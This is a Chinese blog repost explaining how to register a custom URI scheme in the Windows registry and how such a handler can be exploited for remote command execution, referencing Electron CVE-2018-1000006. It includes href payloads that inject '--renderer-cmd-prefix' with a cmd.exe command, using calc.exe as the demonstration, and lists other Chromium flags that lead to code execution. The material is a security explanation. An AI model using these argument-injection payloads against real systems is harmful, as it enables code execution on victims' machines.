URI Scheme注册伪协议实现远程命令执行
生活随笔
收集整理的這篇文章主要介紹了
URI Scheme注册伪协议实现远程命令执行
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
Windows配置注冊表注冊偽協議
1、新建偽協議項
WIN+R 輸入regedit 打開注冊表,在注冊表HKEY_CLASSES_ROOT鍵中新建一個項,項的名字就是你偽協議的名字,例如我注冊一個cmd協議。
然后不用管默認字符串值,新建一個叫URL Procotol的字符串值,值為空即可。
2、新建shell項
在cmd協議項中新建一個項 , 叫做shell,這個名稱不能改。默認字符串值為空
3、新建open項
在shell項中新建一個項 , 叫做open,這個名稱不能改。默認字符串值為空
4、新建command項
在open項中新建一個項 , 叫做command,這個名稱不能改。默認字符串值為可執行文件路徑和參數等
遠程命令執行漏洞
根據這個地方的參數引號閉合情況去構造payload,類似SQL注入
- 是%1 則payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
- 要是“%1”則payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
效果(備注這里需要使用IE內核測試):
其他引起RCE的參數如下:
- --renderer-cmd-prefix
- --gpu-launcher
- --utility-cmd-prefix
- --ppapi-plugin-launcher
- --nacl-gdb
- --ppapi-flash-path
- --ppapi-flash-args
參考文獻:
Electron 自定義協議命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
轉載于:https://www.cnblogs.com/KevinGeorge/p/10201295.html
總結
以上是生活随笔為你收集整理的URI Scheme注册伪协议实现远程命令执行的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 装了这几个插件后,我不得不给 IDEA
- 下一篇: 七种分布式全局 ID 生成策略,你更爱哪